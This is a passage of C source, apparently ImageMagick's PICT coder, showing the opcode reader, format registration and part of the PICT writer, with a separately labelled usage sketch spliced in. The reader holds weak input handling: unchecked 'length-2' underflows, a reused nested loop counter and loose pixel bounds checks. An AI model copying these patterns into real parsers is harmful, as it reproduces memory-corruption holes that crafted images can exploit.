image->units=UndefinedResolution;
if ((image_info->ping != MagickFalse) && (image_info->number_scenes != 0))
if (image->scene >= (image_info->scene+image_info->number_scenes-1))
{
(void) CloseBlob(image);
return(GetFirstImageInList(image));
}
status=SetImageExtent(image,image->columns,image->rows,exception);
if (status == MagickFalse)
return(DestroyImageList(image));
/*
Interpret PICT opcodes.
*/
jpeg=MagickFalse;
for (code=0; EOFBlob(image) == MagickFalse; )
{
if ((image_info->ping != MagickFalse) && (image_info->number_scenes != 0))
if (image->scene >= (image_info->scene+image_info->number_scenes-1))
break;
if ((version == 1) || ((TellBlob(image) % 2) != 0))
code=ReadBlobByte(image);
if (version == 2)
code=(int) ReadBlobMSBShort(image);
if (code < 0)
break;
if (code > 0xa1)
{
if (image->debug != MagickFalse)
(void) LogMagickEvent(CoderEvent,GetMagickModule(),"%04X:",code);
}
else
{
if (image->debug != MagickFalse)
(void) LogMagickEvent(CoderEvent,GetMagickModule(),
" %04X %s: %s",code,codes[code].name,codes[code].description);
switch (code)
{
case 0x01:
{
/*
Clipping rectangle.
*/
length=ReadBlobMSBShort(image);
if (length != 0x000a)
{
for (i=0; i < (ssize_t) (length-2); i++)
if (ReadBlobByte(image) == EOF)
break;
break;
}
if (ReadRectangle(image,&frame) == MagickFalse)
ThrowReaderException(CorruptImageError,"ImproperImageHeader");
if (((frame.left & 0x8000) != 0) || ((frame.top & 0x8000) != 0))
break;
image->columns=1UL*(frame.right-frame.left);
image->rows=1UL*(frame.bottom-frame.top);
(void) SetImageBackgroundColor(image,exception);
break;
}
case 0x12:
case 0x13:
case 0x14:
{
ssize_t
pattern;
size_t
height,
width;
/*
Skip pattern definition.
*/
pattern=1L*ReadBlobMSBShort(image);
for (i=0; i < 8; i++)
if (ReadBlobByte(image) == EOF)
break;
if (pattern == 2)
{
for (i=0; i < 5; i++)
if (ReadBlobByte(image) == EOF)
break;
break;
}
if (pattern != 1)
ThrowReaderException(CorruptImageError,"UnknownPatternType");
length=ReadBlobMSBShort(image);
if (ReadRectangle(image,&frame) == MagickFalse)
ThrowReaderException(CorruptImageError,"ImproperImageHeader");
ReadPixmap(pixmap);
image->depth=1UL*pixmap.component_size;
image->resolution.x=1.0*pixmap.horizontal_resolution;
image->resolution.y=1.0*pixmap.vertical_resolution;
image->units=PixelsPerInchResolution;
(void) ReadBlobMSBLong(image);
flags=1L*ReadBlobMSBShort(image);
length=ReadBlobMSBShort(image);
for (i=0; i <= (ssize_t) length; i++)
(void) ReadBlobMSBLong(image);
width=1UL*(frame.bottom-frame.top);
height=1UL*(frame.right-frame.left);
if (pixmap.bits_per_pixel <= 8)
length&=0x7fff;
if (pixmap.bits_per_pixel == 16)
width<<=1;
if (length == 0)
length=width;
if (length < 8)
{
for (i=0; i < (ssize_t) (length*height); i++)
if (ReadBlobByte(image) == EOF)
break;
}
else
for (j=0; j < (int) height; j++)
if (length > 200)
{
for (j=0; j < (ssize_t) ReadBlobMSBShort(image); j++)
if (ReadBlobByte(image) == EOF)
break;
}
else
for (j=0; j < (ssize_t) ReadBlobByte(image); j++)
if (ReadBlobByte(image) == EOF)
break;
break;
}
case 0x1b:
{
/*
Initialize image background color.
*/
image->background_color.red=(Quantum)
ScaleShortToQuantum(ReadBlobMSBShort(image));
image->background_color.green=(Quantum)
ScaleShortToQuantum(ReadBlobMSBShort(image));
image->background_color.blue=(Quantum)
ScaleShortToQuantum(ReadBlobMSBShort(image));
break;
}
case 0x70:
case 0x71:
case 0x72:
case 0x73:
case 0x74:
case 0x75:
case 0x76:
case 0x77:
{
/*
Skip polygon or region.
*/
length=ReadBlobMSBShort(image);
for (i=0; i < (ssize_t) (length-2); i++)
if (ReadBlobByte(image) == EOF)
break;
break;
}
case 0x90:
case 0x91:
case 0x98:
case 0x99:
case 0x9a:
case 0x9b:
{
Image
*tile_image;
PICTRectangle
source,
destination;
register unsigned char
*p;
size_t
j;
ssize_t
bytes_per_line;
unsigned char
*pixels;
/*
Pixmap clipped by a rectangle.
*/
bytes_per_line=0;
if ((code != 0x9a) && (code != 0x9b))
bytes_per_line=1L*ReadBlobMSBShort(image);
else
{
(void) ReadBlobMSBShort(image);
(void) ReadBlobMSBShort(image);
(void) ReadBlobMSBShort(image);
}
if (ReadRectangle(image,&frame) == MagickFalse)
ThrowReaderException(CorruptImageError,"ImproperImageHeader");
/*
Initialize tile image.
*/
tile_image=CloneImage(image,1UL*(frame.right-frame.left),
1UL*(frame.bottom-frame.top),MagickTrue,exception);
if (tile_image == (Image *) NULL)
return((Image *) NULL);
if ((code == 0x9a) || (code == 0x9b) ||
((bytes_per_line & 0x8000) != 0))
{
ReadPixmap(pixmap);
tile_image->depth=1UL*pixmap.component_size;
tile_image->alpha_trait=pixmap.component_count == 4 ?
BlendPixelTrait : UndefinedPixelTrait;
tile_image->resolution.x=(double) pixmap.horizontal_resolution;
tile_image->resolution.y=(double) pixmap.vertical_resolution;
tile_image->units=PixelsPerInchResolution;
if (tile_image->alpha_trait != UndefinedPixelTrait)
image->alpha_trait=tile_image->alpha_trait;
}
if ((code != 0x9a) && (code != 0x9b))
{
/*
Initialize colormap.
*/
tile_image->colors=2;
if ((bytes_per_line & 0x8000) != 0)
{
(void) ReadBlobMSBLong(image);
flags=1L*ReadBlobMSBShort(image);
tile_image->colors=1UL*ReadBlobMSBShort(image)+1;
}
status=AcquireImageColormap(tile_image,tile_image->colors,
exception);
if (status == MagickFalse)
{
tile_image=DestroyImage(tile_image);
ThrowReaderException(ResourceLimitError,
"MemoryAllocationFailed");
}
if ((bytes_per_line & 0x8000) != 0)
{
for (i=0; i < (ssize_t) tile_image->colors; i++)
{
j=ReadBlobMSBShort(image) % tile_image->colors;
if ((flags & 0x8000) != 0)
j=(size_t) i;
tile_image->colormap[j].red=(Quantum)
ScaleShortToQuantum(ReadBlobMSBShort(image));
tile_image->colormap[j].green=(Quantum)
ScaleShortToQuantum(ReadBlobMSBShort(image));
tile_image->colormap[j].blue=(Quantum)
ScaleShortToQuantum(ReadBlobMSBShort(image));
}
}
else
{
for (i=0; i < (ssize_t) tile_image->colors; i++)
{
tile_image->colormap[i].red=(Quantum) (QuantumRange-
tile_image->colormap[i].red);
tile_image->colormap[i].green=(Quantum) (QuantumRange-
tile_image->colormap[i].green);
tile_image->colormap[i].blue=(Quantum) (QuantumRange-
tile_image->colormap[i].blue);
}
}
}
if (ReadRectangle(image,&source) == MagickFalse)
ThrowReaderException(CorruptImageError,"ImproperImageHeader");
if (ReadRectangle(image,&destination) == MagickFalse)
ThrowReaderException(CorruptImageError,"ImproperImageHeader");
(void) ReadBlobMSBShort(image);
if ((code == 0x91) || (code == 0x99) || (code == 0x9b))
{
/*
Skip region.
*/
length=ReadBlobMSBShort(image);
for (i=0; i < (ssize_t) (length-2); i++)
if (ReadBlobByte(image) == EOF)
break;
}
if ((code != 0x9a) && (code != 0x9b) &&
(bytes_per_line & 0x8000) == 0)
pixels=DecodeImage(image,tile_image,1UL*bytes_per_line,1,&extent,
exception);
else
pixels=DecodeImage(image,tile_image,1UL*bytes_per_line,1U*
pixmap.bits_per_pixel,&extent,exception);
if (pixels == (unsigned char *) NULL)
{
tile_image=DestroyImage(tile_image);
ThrowReaderException(ResourceLimitError,
"MemoryAllocationFailed");
}
/*
Convert PICT tile image to pixel packets.
*/
p=pixels;
for (y=0; y < (ssize_t) tile_image->rows; y++)
{
if (p > (pixels+extent+image->columns))
ThrowReaderException(CorruptImageError,"NotEnoughPixelData");
q=QueueAuthenticPixels(tile_image,0,y,tile_image->columns,1,
exception);
if (q == (Quantum *) NULL)
break;
for (x=0; x < (ssize_t) tile_image->columns; x++)
{
if (tile_image->storage_class == PseudoClass)
{
index=ConstrainColormapIndex(tile_image,*p,exception);
SetPixelIndex(tile_image,index,q);
SetPixelRed(tile_image,
tile_image->colormap[(ssize_t) index].red,q);
SetPixelGreen(tile_image,
tile_image->colormap[(ssize_t) index].green,q);
SetPixelBlue(tile_image,
tile_image->colormap[(ssize_t) index].blue,q);
}
else
{
if (pixmap.bits_per_pixel == 16)
{
i=(*p++);
j=(*p);
SetPixelRed(tile_image,ScaleCharToQuantum(
(unsigned char) ((i & 0x7c) << 1)),q);
SetPixelGreen(tile_image,ScaleCharToQuantum(
(unsigned char) (((i & 0x03) << 6) |
((j & 0xe0) >> 2))),q);
SetPixelBlue(tile_image,ScaleCharToQuantum(
(unsigned char) ((j & 0x1f) << 3)),q);
}
else
if (tile_image->alpha_trait == UndefinedPixelTrait)
{
if (p > (pixels+extent+2*image->columns))
ThrowReaderException(CorruptImageError,
"NotEnoughPixelData");
SetPixelRed(tile_image,ScaleCharToQuantum(*p),q);
SetPixelGreen(tile_image,ScaleCharToQuantum(
*(p+tile_image->columns)),q);
SetPixelBlue(tile_image,ScaleCharToQuantum(
*(p+2*tile_image->columns)),q);
}
else
{
if (p > (pixels+extent+3*image->columns))
ThrowReaderException(CorruptImageError,
"NotEnoughPixelData");
SetPixelAlpha(tile_image,ScaleCharToQuantum(*p),q);
SetPixelRed(tile_image,ScaleCharToQuantum(
*(p+tile_image->columns)),q);
SetPixelGreen(tile_image,ScaleCharToQuantum(
*(p+2*tile_image->columns)),q);
SetPixelBlue(tile_image,ScaleCharToQuantum(
*(p+3*tile_image->columns)),q);
}
}
p++;
q+=GetPixelChannels(tile_image);
}
if (SyncAuthenticPixels(tile_image,exception) == MagickFalse)
break;
if ((tile_image->storage_class == DirectClass) &&
(pixmap.bits_per_pixel != 16))
{
p+=(pixmap.component_count-1)*tile_image->columns;
if (p < pixels)
break;
}
status=SetImageProgress(image,LoadImageTag,y,tile_image->rows);
if (status == MagickFalse)
break;
}
pixels=(unsigned char *) RelinquishMagickMemory(pixels);
if (jpeg == MagickFalse)
if ((code == 0x9a) || (code == 0x9b) ||
((bytes_per_line & 0x8000) != 0))
(void) CompositeImage(image,tile_image,CopyCompositeOp,
MagickTrue,destination.left,destination.top,exception);
tile_image=DestroyImage(tile_image);
break;
}
case 0xa1:
{
unsigned char
*info;
size_t
type;
/*
Comment.
*/
type=ReadBlobMSBShort(image);
length=ReadBlobMSBShort(image);
if (length == 0)
break;
(void) ReadBlobMSBLong(image);
length-=4;
if (length == 0)
break;
info=(unsigned char *) AcquireQuantumMemory(length,sizeof(*info));
if (info == (unsigned char *) NULL)
break;
count=ReadBlob(image,length,info);
if (count != (ssize_t) length)
ThrowReaderException(ResourceLimitError,"UnableToReadImageData");
switch (type)
{
case 0xe0:
{
if (length == 0)
break;
profile=BlobToStringInfo((const void *) NULL,length);
if (profile == (StringInfo *) NULL)
  ThrowReaderException(ResourceLimitError,"MemoryAllocationFailed");
SetStringInfoDatum(profile,info);
status=SetImageProfile(image,"icc",profile,exception);
profile=DestroyStringInfo(profile);
if (status == MagickFalse)
ThrowReaderException(ResourceLimitError,
"MemoryAllocationFailed");
break;
}
case 0x1f2:
{
if (length == 0)
break;
profile=BlobToStringInfo((const void *) NULL,length);
if (profile == (StringInfo *) NULL)
  ThrowReaderException(ResourceLimitError,"MemoryAllocationFailed");
SetStringInfoDatum(profile,info);
status=SetImageProfile(image,"iptc",profile,exception);
if (status == MagickFalse)
ThrowReaderException(ResourceLimitError,
"MemoryAllocationFailed");
profile=DestroyStringInfo(profile);
break;
}
default:
break;
}
info=(unsigned char *) RelinquishMagickMemory(info);
break;
}
default:
{
/*
Skip to next op code.
*/
if (code < 0)
break;
if (codes[code].length == -1)
(void) ReadBlobMSBShort(image);
else
for (i=0; i < (ssize_t) codes[code].length; i++)
if (ReadBlobByte(image) == EOF)
break;
}
}
}
if (code == 0xc00)
{
/*
Skip header.
*/
for (i=0; i < 24; i++)
if (ReadBlobByte(image) == EOF)
break;
continue;
}
if (((code >= 0xb0) && (code <= 0xcf)) ||
((code >= 0x8000) && (code <= 0x80ff)))
continue;
if (code == 0x8200)
{
FILE
*file;
Image
*tile_image;
ImageInfo
*read_info;
int
unique_file;
/*
Embedded JPEG.
*/
jpeg=MagickTrue;
read_info=CloneImageInfo(image_info);
SetImageInfoBlob(read_info,(void *) NULL,0);
file=(FILE *) NULL;
unique_file=AcquireUniqueFileResource(read_info->filename);
if (unique_file != -1)
file=fdopen(unique_file,"wb");
if ((unique_file == -1) || (file == (FILE *) NULL))
{
(void) RelinquishUniqueFileResource(read_info->filename);
(void) CopyMagickString(image->filename,read_info->filename,
MagickPathExtent);
ThrowFileException(exception,FileOpenError,
"UnableToCreateTemporaryFile",image->filename);
image=DestroyImageList(image);
return((Image *) NULL);
}
length=ReadBlobMSBLong(image);
if (length > 154)
{
for (i=0; i < 6; i++)
(void) ReadBlobMSBLong(image);
if (ReadRectangle(image,&frame) == MagickFalse)
{
(void) fclose(file);
(void) RelinquishUniqueFileResource(read_info->filename);
ThrowReaderException(CorruptImageError,"ImproperImageHeader");
}
for (i=0; i < 122; i++)
if (ReadBlobByte(image) == EOF)
break;
for (i=0; i < (ssize_t) (length-154); i++)
{
c=ReadBlobByte(image);
if (c == EOF)
break;
(void) fputc(c,file);
}
}
(void) fclose(file);
(void) close(unique_file);
tile_image=ReadImage(read_info,exception);
(void) RelinquishUniqueFileResource(read_info->filename);
read_info=DestroyImageInfo(read_info);
if (tile_image == (Image *) NULL)
continue;
(void) FormatLocaleString(geometry,MagickPathExtent,"%.20gx%.20g",
(double) MagickMax(image->columns,tile_image->columns),
(double) MagickMax(image->rows,tile_image->rows));
(void) SetImageExtent(image,
MagickMax(image->columns,tile_image->columns),
MagickMax(image->rows,tile_image->rows),exception);
(void) TransformImageColorspace(image,tile_image->colorspace,exception);
(void) CompositeImage(image,tile_image,CopyCompositeOp,MagickTrue,
frame.left,frame.right,exception);
image->compression=tile_image->compression;
tile_image=DestroyImage(tile_image);
continue;
}
if ((code == 0xff) || (code == 0xffff))
break;
if (((code >= 0xd0) && (code <= 0xfe)) ||
((code >= 0x8100) && (code <= 0xffff)))
{
/*
Skip reserved.
*/
length=ReadBlobMSBShort(image);
for (i=0; i < (ssize_t) length; i++)
if (ReadBlobByte(image) == EOF)
break;
continue;
}
if ((code >= 0x100) && (code <= 0x7fff))
{
/*
Skip reserved.
*/
length=(size_t) ((code >> 7) & 0xff);
for (i=0; i < (ssize_t) length; i++)
if (ReadBlobByte(image) == EOF)
break;
continue;
}
}
(void) CloseBlob(image);
return(GetFirstImageInList(image));
}
#endif
/*
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
% %
% %
% %
% R e g i s t e r P I C T I m a g e %
% %
% %
% %
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%
% RegisterPICTImage() adds attributes for the PICT image format to
% the list of supported formats. The attributes include the image format
% tag, a method to read and/or write the format, whether the format
% supports the saving of more than one frame to the same file or blob,
% whether the format supports native in-memory I/O, and a brief
% description of the format.
%
% The format of the RegisterPICTImage method is:
%
% size_t RegisterPICTImage(void)
%
*/
ModuleExport size_t RegisterPICTImage(void)
{
MagickInfo
*entry;
entry=AcquireMagickInfo("PICT","PCT","Apple Macintosh QuickDraw/PICT");
entry->decoder=(DecodeImageHandler *) ReadPICTImage;
entry->encoder=(EncodeImageHandler *) WritePICTImage;
entry->flags^=CoderAdjoinFlag;
entry->flags|=CoderSeekableStreamFlag;
entry->magick=(IsImageFormatHandler *) IsPICT;
(void) RegisterMagickInfo(entry);
entry=AcquireMagickInfo("PICT","PICT","Apple Macintosh QuickDraw/PICT");
entry->decoder=(DecodeImageHandler *) ReadPICTImage;
entry->encoder=(EncodeImageHandler *) WritePICTImage;
entry->flags^=CoderAdjoinFlag;
entry->flags|=CoderSeekableStreamFlag;
entry->magick=(IsImageFormatHandler *) IsPICT;
(void) RegisterMagickInfo(entry);
return(MagickImageCoderSignature);
}
/*
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
% %
% %
% %
% U n r e g i s t e r P I C T I m a g e %
% %
% %
% %
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%
% UnregisterPICTImage() removes format registrations made by the
% PICT module from the list of supported formats.
%
% The format of the UnregisterPICTImage method is:
%
% UnregisterPICTImage(void)
%
*/
ModuleExport void UnregisterPICTImage(void)
{
(void) UnregisterMagickInfo("PCT");
(void) UnregisterMagickInfo("PICT");
}
/*
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
% %
% %
% %
% W r i t e P I C T I m a g e %
% %
% %
% %
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%
% WritePICTImage() writes an image to a file in the Apple Macintosh
% QuickDraw/PICT image format.
%
% The format of the WritePICTImage method is:
%
% MagickBooleanType WritePICTImage(const ImageInfo *image_info,
% Image *image,ExceptionInfo *exception)
%
% A description of each parameter follows.
%
% o image_info: the image info.
%
% o image: The image.
%
% o exception: return any errors or warnings in this structure.
%
*/
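/*
  Hedged usage sketch, not part of the original coder: writing normally goes
  through the generic WriteImage() entry point, and the coder is selected by
  the filename suffix or image_info->magick.  The output name is
  hypothetical, and the WriteImage() prototype is assumed to be the
  MagickCore one that takes an exception argument.
*/
static MagickBooleanType WritePictViaGenericApiSketch(Image *image,
  ExceptionInfo *exception)
{
  ImageInfo
    *write_info;

  MagickBooleanType
    status;

  write_info=CloneImageInfo((ImageInfo *) NULL);
  (void) CopyMagickString(image->filename,"sketch.pict",MagickPathExtent);
  status=WriteImage(write_info,image,exception);  /* dispatches to this coder */
  write_info=DestroyImageInfo(write_info);
  return(status);
}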
static MagickBooleanType WritePICTImage(const ImageInfo *image_info,
Image *image,ExceptionInfo *exception)
{
#define MaxCount 128
#define PictCropRegionOp 0x01
#define PictEndOfPictureOp 0xff
#define PictJPEGOp 0x8200
#define PictInfoOp 0x0C00
#define PictInfoSize 512
#define PictPixmapOp 0x9A
#define PictPICTOp 0x98
#define PictVersion 0x11
const StringInfo
*profile;
double
x_resolution,
y_resolution;
MagickBooleanType
status;
MagickOffsetType
offset;
PICTPixmap
pixmap;
PICTRectangle
bounds,
crop_rectangle,
destination_rectangle,
frame_rectangle,
size_rectangle,
source_rectangle;
register const Quantum
*p;
register ssize_t
i,
x;
size_t
bytes_per_line,
count,
storage_class;
ssize_t
y;
unsigned char
*buffer,
*packed_scanline,
*scanline;
unsigned short
base_address,
row_bytes,
transfer_mode;
/*
Open output image file.
*/
assert(image_info != (const ImageInfo *) NULL);
assert(image_info->signature == MagickSignature);
assert(image != (Image *) NULL);
assert(image->signature == MagickSignature);
if (image->debug != MagickFalse)
(void) LogMagickEvent(TraceEvent,GetMagickModule(),"%s",image->filename);
if ((image->columns > 65535L) || (image->rows > 65535L))
ThrowWriterException(ImageError,"WidthOrHeightExceedsLimit");
assert(exception != (ExceptionInfo *) NULL);
assert(exception->signature == MagickSignature);
status=OpenBlob(image_info,image,WriteBinaryBlobMode,exception);
if (status == MagickFalse)
return(status);
(void) TransformImageColorspace(image,sRGBColorspace,exception);
/*
Initialize image info.
*/
size_rectangle.top=0;
size_rectangle.left=0;
size_rectangle.bottom=(short) image->rows;
size_rectangle.right=(short) image->columns;
frame_rectangle=size_rectangle;
crop_rectangle=size_rectangle;
source_rectangle=size_rectangle;
destination_rectangle=size_rectangle;
base_address=0xff;
row_bytes=(unsigned short) (image->columns | 0x8000);
bounds.top=0;
bounds.left=0;
bounds.bottom=(short) image->rows;
bounds.right=(short) image->columns;
pixmap.version=0;
pixmap.pack_type=0;
pixmap.pack_size=0;
pixmap.pixel_type=0;
pixmap.bits_per_pixel=8;
pixmap.component_count=1;
pixmap.component_size=8;
pixmap.plane_bytes=0;
pixmap.table=0;
pixmap.reserved=0;
transfer_mode=0;
x_resolution=image->resolution.x != 0.0 ? image->resolution.x :
DefaultResolution;
y_resolution=image->resolution.y != 0.0 ? image->resolution.y :
DefaultResolution;
storage_class=image->storage_class;
if (image_info->compression == JPEGCompression)
storage_class=DirectClass;
if (storage_class == DirectClass)
{
pixmap.component_count=image->alpha_trait != UndefinedPixelTrait ? 4 : 3;
pixmap.pixel_type=16;
pixmap.bits_per_pixel=32;
pixmap.pack_type=0x04;
transfer_mode=0x40;
row_bytes=(unsigned short) ((4*image->columns) | 0x8000);
}
/*
Allocate memory.
*/
bytes_per_line=image->columns;
if (storage_class == DirectClass)
bytes_per_line*=image->alpha_trait != UndefinedPixelTrait ? 4 : 3;
buffer=(unsigned char *) AcquireQuantumMemory(PictInfoSize,sizeof(*buffer));
packed_scanline=(unsigned char *) AcquireQuantumMemory((size_t)
(row_bytes+MaxCount),sizeof(*packed_scanline));
scanline=(unsigned char *) AcquireQuantumMemory(row_bytes,sizeof(*scanline));
if ((buffer == (unsigned char *) NULL) ||
(packed_scanline == (unsigned char *) NULL) ||
(scanline == (unsigned char *) NULL))
ThrowWriterException(ResourceLimitError,"MemoryAllocationFailed");
(void) ResetMagickMemory(scanline,0,row_bytes);
(void) ResetMagickMemory(packed_scanline,0,(size_t) (row_bytes+MaxCount));
/*
Write header, header size, size bounding box, version, and reserved.
*/
(void) ResetMagickMemory(buffer,0,PictInfoSize);
(void) WriteBlob(image,PictInfoSize,buffer);
(void) WriteBlobMSBShort(image,0);
(void) WriteBlobMSBShort(image,(unsigned short) size_rectangle.top);
(void) WriteBlobMSBShort(image,(unsigned short) size_rectangle.left);
(void) WriteBlobMSBShort(image,(unsigned short) size_rectangle.bottom);
(void) WriteBlobMSBShort(image,(unsigned short) size_rectangle.right);
(void) WriteBlobMSBShort(image,PictVersion);
(void) WriteBlobMSBShort(image,0x02ff); /* version #2 */
(void) WriteBlobMSBShort(image,PictInfoOp);
(void) WriteBlobMSBLong(image,0xFFFE0000UL);
/*
Write full size of the file, resolution, frame bounding box, and reserved.
*/
(void) WriteBlobMSBShort(image,(unsigned short) x_resolution);
(void) WriteBlobMSBShort(image,0x0000);
(void) WriteBlobMSBShort(image,(unsigned short) y_resolution);
(void) WriteBlobMSBShort(image,0x0000);
(void) WriteBlobMSBShort(image,(unsigned short) frame_rectangle.top);
(void) WriteBlobMSBShort(image,(unsigned short) frame_rectangle.left);
(void) WriteBlobMSBShort(image,(unsigned short) frame_rectangle.bottom);
(void) WriteBlobMSBShort(image,(unsigned short) frame_rectangle.right);
(void) WriteBlobMSBLong(image,0x00000000L);
profile=GetImageProfile(image,"iptc");
if (profile != (StringInfo *) NULL)
{
(void) WriteBlobMSBShort(image,0xa1);
(void) WriteBlobMSBShort(image,0x1f2);
(void) WriteBlobMSBShort(image,(unsigned short)
(GetStringInfoLength(profile)+4));
(void) WriteBlobString(image,"8BIM");
(void) WriteBlob(image,GetStringInfoLength(profile),
GetStringInfoDatum(profile));
}
profile=GetImageProfile(image,"icc");
if (profile != (StringInfo *) NULL)
{
(void) WriteBlobMSBShort(image,0xa1);
(void) WriteBlobMSBShort(image,0xe0);
(void) WriteBlobMSBShort(image,(unsigned short)
(GetStringInfoLength(profile)+4));
(void) WriteBlobMSBLong(image,0x00000000UL);
(void) WriteBlob(image,GetStringInfoLength(profile),
GetStringInfoDatum(profile));
(void) WriteBlobMSBShort(image,0xa1);
(void) WriteBlobMSBShort(image,0xe0);
(void) WriteBlobMSBShort(image,4);
(void) WriteBlobMSBLong(image,0x00000002UL);
}
/*
Write crop region opcode and crop bounding box.
*/
(void) WriteBlobMSBShort(image,PictCropRegionOp);
(void) WriteBlobMSBShort(image,0xa);
(void) WriteBlobMSBShort(image,(unsigned short) crop_rectangle.top);
(void) WriteBlobMSBShort(image,(unsigned short) crop_rectangle.left);
(void) WriteBlobMSBShort(image,(unsigned short) crop_rectangle.bottom);
(void) WriteBlobMSBShort(image,(unsigned short) crop_rectangle.right);
if (image_info->compression == JPEGCompression)
{
Image
*jpeg_image;
ImageInfo
*jpeg_info;
size_t
length;
unsigned char
*blob;
jpeg_image=CloneImage(image,0,0,MagickTrue,exception);
if (jpeg_image == (Image *) NULL)
{
(void) CloseBlob(image);
return(MagickFalse);
}
jpeg_info=CloneImageInfo(image_info);
(void) CopyMagickString(jpeg_info->magick,"JPEG",MagickPathExtent);
length=0;
blob=(unsigned char *) ImageToBlob(jpeg_info,jpeg_image,&length,
exception);
jpeg_info=DestroyImageInfo(jpeg_info);
if (blob == (unsigned char *) NULL)
return(MagickFalse);
jpeg_image=DestroyImage(jpeg_image);
(void) WriteBlobMSBShort(image,PictJPEGOp);
(void) WriteBlobMSBLong(image,(unsigned int) length+154);
(void) WriteBlobMSBShort(image,0x0000);
(void) WriteBlobMSBLong(image,0x00010000UL);
(void) WriteBlobMSBLong(image,0x00000000UL);
(void) WriteBlobMSBLong(image,0x00000000UL);
(void) WriteBlobMSBLong(image,0x00000000UL);
(void) WriteBlobMSBLong(image,0x00010000UL);
(void) WriteBlobMSBLong(image,0x00000000UL);
(void) WriteBlobMSBLong(image,0x00000000UL);
(void) WriteBlobMSBLong(image,0x00000000UL);
(void) WriteBlobMSBLong(image,0x40000000UL);
(void) WriteBlobMSBLong(image,0x00000000UL);
(void) WriteBlobMSBLong(image,0x00000000UL);
(void) WriteBlobMSBLong(image,0x00000000UL);
(void) WriteBlobMSBLong(image,0x00400000UL);
(void) WriteBlobMSBShort(image,0x0000);
(void) WriteBlobMSBShort(image,(unsigned short) image->rows);
(void) WriteBlobMSBShort(image,(unsigned short) image->columns);
(void) WriteBlobMSBShort(image,0x0000);
(void) WriteBlobMSBShort(image,768);
(void) WriteBlobMSBShort(image,0x0000);
(void) WriteBlobMSBLong(image,0x00000000UL);
(void) WriteBlobMSBLong(image,0x00566A70UL);
(void) WriteBlobMSBLong(image,0x65670000UL);
(void) WriteBlobMSBLong(image,0x00000000UL);
(void) WriteBlobMSBLong(image,0x00000001UL);
(void) WriteBlobMSBLong(image,0x00016170UL);
(void) WriteBlobMSBLong(image,0x706C0000UL);
(void) WriteBlobMSBLong(image,0x00000000UL);
(void) WriteBlobMSBShort(image,768);
(void) WriteBlobMSBShort(image,(unsigned short) image->columns);
(void) WriteBlobMSBShort(image,(unsigned short) image->rows);
(void) WriteBlobMSBShort(image,(unsigned short) x_resolution);
(void) WriteBlobMSBShort(image,0x0000);
(void) WriteBlobMSBShort(image,(unsigned short) y_resolution);
(void) WriteBlobMSBLong(image,0x00000000UL);
(void) WriteBlobMSBLong(image,0x87AC0001UL);
(void) WriteBlobMSBLong(image,0x0B466F74UL);
(void) WriteBlobMSBLong(image,0x6F202D20UL);
(void) WriteBlobMSBLong(image,0x4A504547UL);
(void) WriteBlobMSBLong(image,0x00000000UL);
(void) WriteBlobMSBLong(image,0x00000000UL);
(void) WriteBlobMSBLong(image,0x00000000UL);
(void) WriteBlobMSBLong(image,0x00000000UL);
(void) WriteBlobMSBLong(image,0x00000000UL);
(void) WriteBlobMSBLong(image,0x0018FFFFUL);
(void) WriteBlob(image,length,blob);
if ((length & 0x01) != 0)
(void) WriteBlobByte(image,'\0');
blob=(unsigned char *) RelinquishMagickMemory(blob);
}
/*
    Write picture opcode, row bytes, picture bounding box, and version.
*/
if (storage_class == PseudoClass)
(void) WriteBlobMSBShort(image,PictPICTOp);
else
{
(void) WriteBlobMSBShort(image,PictPixmapOp);
(void) WriteBlobMSBLong(image,(size_t) base_address);
}
(void) WriteBlobMSBShort(image,(unsigned short) (row_bytes | 0x8000));
(void) WriteBlobMSBShort(image,(unsigned short) bounds.top);
(void) WriteBlobMSBShort(image,(unsigned short) bounds.left);
(void) WriteBlobMSBShort(image,(unsigned short) bounds.bottom);
(void) WriteBlobMSBShort(image,(unsigned short) bounds.right);
/*
Write pack type, pack size, resolution, pixel type, and pixel size.
*/
(void) WriteBlobMSBShort(image,(unsigned short) pixmap.version);
(void) WriteBlobMSBShort(image,(unsigned short) pixmap.pack_type);
(void) WriteBlobMSBLong(image,(unsigned int) pixmap.pack_size);
(void) WriteBlobMSBShort(image,(unsigned short) (x_resolution+0.5));
(void) WriteBlobMSBShort(image,0x0000);
(void) WriteBlobMSBShort(image,(unsigned short) (y_resolution+0.5));
(void) WriteBlobMSBShort(image,0x0000);
(void) WriteBlobMSBShort(image,(unsigned short) pixmap.pixel_type);
(void) WriteBlobMSBShort(image,(unsigned short) pixmap.bits_per_pixel);
/*
Write component count, size, plane bytes, table size, and reserved.
*/
(void) WriteBlobMSBShort(image,(unsigned short) pixmap.component_count);
(void) WriteBlobMSBShort(image,(unsigned short) pixmap.component_size);
(void) WriteBlobMSBLong(image,(unsigned int) pixmap.plane_bytes);
(void) WriteBlobMSBLong(image,(unsigned int) pixmap.table);
(void) WriteBlobMSBLong(image,(unsigned int) pixmap.reserved);
if (storage_class == PseudoClass)
{
/*
Write image colormap.
*/
(void) WriteBlobMSBLong(image,0x00000000L); /* color seed */
(void) WriteBlobMSBShort(image,0L); /* color flags */
(void) WriteBlobMSBShort(image,(unsigned short) (image->colors-1));
for (i=0; i < (ssize_t) image->colors; i++)
{
(void) WriteBlobMSBShort(image,(unsigned short) i);
(void) WriteBlobMSBShort(image,ScaleQuantumToShort(
image->colormap[i].red));
(void) WriteBlobMSBShort(image,ScaleQuantumToShort(
image->colormap[i].green));
(void) WriteBlobMSBShort(image,ScaleQuantumToShort(
image->colormap[i].blue));
}
}
/*
Write source and destination rectangle.
*/
(void) WriteBlobMSBShort(image,(unsigned short) source_rectangle.top);
(void) WriteBlobMSBShort(image,(unsigned short) source_rectangle.left);
